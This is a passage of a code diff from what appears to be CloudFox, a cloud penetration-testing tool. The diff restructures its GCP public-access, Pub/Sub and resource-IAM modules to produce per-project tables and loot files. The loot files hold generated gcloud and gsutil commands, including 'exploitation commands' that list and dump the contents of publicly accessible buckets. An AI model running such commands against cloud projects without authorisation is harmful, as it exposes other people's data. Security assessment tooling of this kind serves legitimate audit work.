+1081,91 @@ func (m *PublicAccessModule) addResourceToLoot(resource PublicResource) { // Output Generation // ------------------------------ func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PublicAccessModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, resources := range m.ProjectPublicResources { + header := []string{ + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Public Role", + "Size", + "Additional Info", + } + + var body [][]string + for _, r := range resources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + r.AdditionalInfo, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + projectLevelData[projectID] = PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PublicAccessModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllPublicResources() + header := []string{ "Project ID", "Project Name", @@ -1075,13 +1173,13 @@ func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Lo "Resource Name", "Location", "Access Level", - "Role", + "Public Role", "Size", "Additional Info", } var body [][]string - for _, r := range m.PublicResources { + for _, r := range allResources { location := r.Location if location == "" { location = "global" @@ -1104,11 +1202,13 @@ func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Lo }) } - // Collect loot files + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index 555fdd52..a561798f 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -48,10 +48,10 @@ Attack Surface: type PubSubModule struct { gcpinternal.BaseGCPModule - Topics []PubSubService.TopicInfo - Subscriptions []PubSubService.SubscriptionInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectTopics map[string][]PubSubService.TopicInfo // projectID -> topics + ProjectSubscriptions map[string][]PubSubService.SubscriptionInfo // projectID -> subscriptions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -75,13 +75,12 @@ func runGCPPubSubCommand(cmd *cobra.Command, args []string) { } module := &PubSubModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Topics: []PubSubService.TopicInfo{}, - Subscriptions: []PubSubService.SubscriptionInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTopics: make(map[string][]PubSubService.TopicInfo), + ProjectSubscriptions: make(map[string][]PubSubService.SubscriptionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -91,7 +90,10 @@ func runGCPPubSubCommand(cmd *cobra.Command, args []string) { func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) - totalResources := len(m.Topics) + len(m.Subscriptions) + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + + totalResources := len(allTopics) + len(allSubs) if totalResources == 0 { logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) return @@ -101,7 +103,7 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { publicTopics := 0 publicSubs := 0 pushSubs := 0 - for _, topic := range m.Topics { + for _, topic := range allTopics { for _, binding := range topic.IAMBindings { if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { publicTopics++ @@ -109,7 +111,7 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { } } } - for _, sub := range m.Subscriptions { + for _, sub := range allSubs { for _, binding := range sub.IAMBindings { if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { publicSubs++ @@ -121,7 +123,7 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { } } - msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(m.Topics), len(m.Subscriptions)) + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(allTopics), len(allSubs)) if publicTopics > 0 || publicSubs > 0 { msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) } @@ -133,6 +135,24 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllTopics returns all topics from all projects +func (m *PubSubModule) getAllTopics() []PubSubService.TopicInfo { + var all []PubSubService.TopicInfo + for _, topics := range m.ProjectTopics { + all = append(all, topics...) + } + return all +} + +// getAllSubscriptions returns all subscriptions from all projects +func (m *PubSubModule) getAllSubscriptions() []PubSubService.SubscriptionInfo { + var all []PubSubService.SubscriptionInfo + for _, subs := range m.ProjectSubscriptions { + all = append(all, subs...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -143,36 +163,51 @@ func (m *PubSubModule) processProject(ctx context.Context, projectID string, log ps := PubSubService.New() + var topics []PubSubService.TopicInfo + var subs []PubSubService.SubscriptionInfo + // Get topics - topics, err := ps.Topics(projectID) + topicsResult, err := ps.Topics(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) } else { - m.mu.Lock() - m.Topics = append(m.Topics, topics...) - for _, topic := range topics { - m.addTopicToLoot(topic) - } - m.mu.Unlock() + topics = topicsResult } // Get subscriptions - subs, err := ps.Subscriptions(projectID) + subsResult, err := ps.Subscriptions(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) } else { - m.mu.Lock() - m.Subscriptions = append(m.Subscriptions, subs...) - for _, sub := range subs { - m.addSubscriptionToLoot(sub) + subs = subsResult + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectTopics[projectID] = topics + m.ProjectSubscriptions[projectID] = subs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.mu.Unlock() } + for _, topic := range topics { + m.addTopicToLoot(projectID, topic) + } + for _, sub := range subs { + m.addSubscriptionToLoot(projectID, sub) + } + m.mu.Unlock() + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) } @@ -181,15 +216,13 @@ func (m *PubSubModule) processProject(ctx context.Context, projectID string, log // ------------------------------ // Loot File Management // ------------------------------ -func (m *PubSubModule) initializeLootFiles() { - m.LootMap["pubsub-commands"] = &internal.LootFile{ - Name: "pubsub-commands", - Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.TopicInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return } -} -func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Topic: %s (Project: %s)\n"+ "# Subscriptions: %d\n", topic.Name, topic.ProjectID, @@ -197,17 +230,17 @@ func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { ) if topic.KmsKeyName != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) } if len(topic.IAMBindings) > 0 { - m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range topic.IAMBindings { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe topic:\n"+ "gcloud pubsub topics describe %s --project=%s\n\n"+ "# Get IAM policy:\n"+ @@ -223,8 +256,13 @@ func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { ) } -func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( +func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService.SubscriptionInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( "## Subscription: %s (Project: %s)\n"+ "# Topic: %s\n", sub.Name, sub.ProjectID, @@ -233,12 +271,12 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) // Cross-project info if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + lootFile.Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) } // Push endpoint info if sub.PushEndpoint != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Push Endpoint: %s\n"+ "# Push Service Account: %s\n", sub.PushEndpoint, @@ -248,15 +286,15 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) // Export destinations if sub.BigQueryTable != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + lootFile.Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) } if sub.CloudStorageBucket != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) + lootFile.Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) } // Dead letter config if sub.DeadLetterTopic != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Dead Letter Topic: %s (Max Attempts: %d)\n", sub.DeadLetterTopic, sub.MaxDeliveryAttempts, @@ -265,13 +303,13 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) // IAM bindings if len(sub.IAMBindings) > 0 { - m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range sub.IAMBindings { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe subscription:\n"+ "gcloud pubsub subscriptions describe %s --project=%s\n\n"+ "# Get IAM policy:\n"+ @@ -285,12 +323,12 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) // BigQuery command if sub.BigQueryTable != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) + lootFile.Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) } // GCS command if sub.CloudStorageBucket != "" { - m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) + lootFile.Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) } } @@ -298,78 +336,59 @@ func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) // Output Generation // ------------------------------ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Topics table - one row per IAM binding - topicsHeader := []string{ - "Project Name", - "Project ID", - "Topic Name", - "Subscriptions", - "KMS Key", - "Retention", - "IAM Role", - "IAM Member", - } - - var topicsBody [][]string - for _, topic := range m.Topics { - // Format KMS key + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PubSubModule) getTopicsHeader() []string { + return []string{ + "Project Name", "Project ID", "Topic Name", "Subscriptions", + "KMS Key", "Retention", "Resource Role", "Resource Principal", + } +} + +func (m *PubSubModule) getSubsHeader() []string { + return []string{ + "Project Name", "Project ID", "Subscription", "Topic", "Type", + "Push Endpoint / Export", "Cross-Project", "Dead Letter", "Resource Role", "Resource Principal", + } +} + +func (m *PubSubModule) topicsToTableBody(topics []PubSubService.TopicInfo) [][]string { + var body [][]string + for _, topic := range topics { kmsKey := "-" if topic.KmsKeyName != "" { kmsKey = topic.KmsKeyName } - - // Format retention retention := "-" if topic.MessageRetentionDuration != "" { retention = topic.MessageRetentionDuration } if len(topic.IAMBindings) > 0 { - // One row per IAM binding for _, binding := range topic.IAMBindings { - topicsBody = append(topicsBody, []string{ - m.GetProjectName(topic.ProjectID), - topic.ProjectID, - topic.Name, - fmt.Sprintf("%d", topic.SubscriptionCount), - kmsKey, - retention, - binding.Role, - binding.Member, + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), topic.ProjectID, topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), kmsKey, retention, binding.Role, binding.Member, }) } } else { - // No IAM bindings - single row with empty IAM columns - topicsBody = append(topicsBody, []string{ - m.GetProjectName(topic.ProjectID), - topic.ProjectID, - topic.Name, - fmt.Sprintf("%d", topic.SubscriptionCount), - kmsKey, - retention, - "-", - "-", + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), topic.ProjectID, topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), kmsKey, retention, "-", "-", }) } } + return body +} - // Subscriptions table - one row per IAM binding - subsHeader := []string{ - "Project Name", - "Project ID", - "Subscription", - "Topic", - "Type", - "Push Endpoint / Export", - "Cross-Project", - "Dead Letter", - "IAM Role", - "IAM Member", - } - - var subsBody [][]string - for _, sub := range m.Subscriptions { - // Determine type +func (m *PubSubModule) subsToTableBody(subs []PubSubService.SubscriptionInfo) [][]string { + var body [][]string + for _, sub := range subs { subType := "Pull" destination := "-" if sub.PushEndpoint != "" { @@ -383,82 +402,123 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) destination = sub.CloudStorageBucket } - // Format cross-project crossProject := "-" if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { crossProject = sub.TopicProject } - // Format dead letter deadLetter := "-" if sub.DeadLetterTopic != "" { deadLetter = sub.DeadLetterTopic } if len(sub.IAMBindings) > 0 { - // One row per IAM binding for _, binding := range sub.IAMBindings { - subsBody = append(subsBody, []string{ - m.GetProjectName(sub.ProjectID), - sub.ProjectID, - sub.Name, - sub.Topic, - subType, - destination, - crossProject, - deadLetter, - binding.Role, - binding.Member, + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), sub.ProjectID, sub.Name, sub.Topic, subType, + destination, crossProject, deadLetter, binding.Role, binding.Member, }) } } else { - // No IAM bindings - single row with empty IAM columns - subsBody = append(subsBody, []string{ - m.GetProjectName(sub.ProjectID), - sub.ProjectID, - sub.Name, - sub.Topic, - subType, - destination, - crossProject, - deadLetter, - "-", - "-", + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), sub.ProjectID, sub.Name, sub.Topic, subType, + destination, crossProject, deadLetter, "-", "-", }) } } + return body +} - // Collect loot files - only include if they have content beyond the header - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *PubSubModule) buildTablesForProject(projectID string) []internal.TableFile { + topics := m.ProjectTopics[projectID] + subs := m.ProjectSubscriptions[projectID] + + topicsBody := m.topicsToTableBody(topics) + subsBody := m.subsToTableBody(subs) + + var tableFiles []internal.TableFile + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", Header: m.getTopicsHeader(), Body: topicsBody, + }) + } + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", Header: m.getSubsHeader(), Body: subsBody, + }) + } + return tableFiles +} + +func (m *PubSubModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectTopics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubscriptions { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = PubSubOutput{Table: tableFiles, Loot: lootFiles} } - // Build table files - tableFiles := []internal.TableFile{} + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PubSubModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + topicsBody := m.topicsToTableBody(allTopics) + subsBody := m.subsToTableBody(allSubs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile if len(topicsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", - Header: topicsHeader, - Body: topicsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", Header: m.getTopicsHeader(), Body: topicsBody, }) } - if len(subsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", - Header: subsHeader, - Body: subsBody, + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", Header: m.getSubsHeader(), Body: subsBody, }) } - output := PubSubOutput{ - Table: tableFiles, - Loot: lootFiles, - } + output := PubSubOutput{Table: tableFiles, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { @@ -466,16 +526,8 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) } err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, + "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output, ) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go index ff659376..7afb5c9e 100644 --- a/gcp/commands/resourceiam.go +++ b/gcp/commands/resourceiam.go @@ -45,9 +45,9 @@ Key Findings: type ResourceIAMModule struct { gcpinternal.BaseGCPModule - Bindings []resourceiamservice.ResourceIAMBinding - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectBindings map[string][]resourceiamservice.ResourceIAMBinding + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -71,12 +71,11 @@ func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { } module := &ResourceIAMModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Bindings: []resourceiamservice.ResourceIAMBinding{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBindings: make(map[string][]resourceiamservice.ResourceIAMBinding), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -88,7 +87,8 @@ func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, m.processProject) - if len(m.Bindings) == 0 { + allBindings := m.getAllBindings() + if len(allBindings) == 0 { logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) return } @@ -96,7 +96,7 @@ func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) // Count statistics publicCount := 0 resourceTypes := make(map[string]int) - for _, b := range m.Bindings { + for _, b := range allBindings { resourceTypes[b.ResourceType]++ if b.IsPublic { publicCount++ @@ -110,7 +110,7 @@ func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", - len(m.Bindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + len(allBindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) if publicCount > 0 { logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) @@ -127,6 +127,21 @@ func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) } + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", + } + m.LootMap[projectID]["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", + } + m.mu.Unlock() + svc := resourceiamservice.New() bindings, err := svc.GetAllResourceIAM(ctx, projectID) if err != nil { @@ -137,12 +152,12 @@ func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.Bindings = append(m.Bindings, bindings...) + m.ProjectBindings[projectID] = append(m.ProjectBindings[projectID], bindings...) // Generate loot for public resources for _, b := range bindings { if b.IsPublic { - m.addPublicResourceToLoot(b) + m.addPublicResourceToLoot(b, projectID) } } m.mu.Unlock() @@ -152,22 +167,20 @@ func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string } } -// ------------------------------ -// Loot Management -// ------------------------------ -func (m *ResourceIAMModule) initializeLootFiles() { - m.LootMap["resource-iam-commands"] = &internal.LootFile{ - Name: "resource-iam-commands", - Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["public-resources"] = &internal.LootFile{ - Name: "public-resources", - Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", +// getAllBindings aggregates all bindings across projects +func (m *ResourceIAMModule) getAllBindings() []resourceiamservice.ResourceIAMBinding { + var allBindings []resourceiamservice.ResourceIAMBinding + for _, bindings := range m.ProjectBindings { + allBindings = append(allBindings, bindings...) } + return allBindings } -func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding) { - m.LootMap["public-resources"].Contents += fmt.Sprintf( +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( "# %s: %s\n# Member: %s, Role: %s\n", b.ResourceType, b.ResourceName, b.Member, b.Role, ) @@ -175,17 +188,17 @@ func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.Resourc // Add exploitation commands based on resource type switch b.ResourceType { case "bucket": - m.LootMap["public-resources"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( "gsutil ls %s\ngsutil cat %s/*\n\n", b.ResourceName, b.ResourceName, ) case "function": - m.LootMap["public-resources"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", b.ResourceID, b.ProjectID, ) case "cloudrun": - m.LootMap["public-resources"].Contents += fmt.Sprintf( + m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", b.ResourceID, b.ProjectID, ) @@ -211,6 +224,148 @@ func shortenRole(role string) string { // Output Generation // ------------------------------ func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ResourceIAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, bindings := range m.ProjectBindings { + header := []string{ + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + groupBindings := resourceBindings[key] + if len(groupBindings) == 0 { + continue + } + + // Use first binding for resource info + first := groupBindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range groupBindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range groupBindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && + !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + projectLevelData[projectID] = ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: 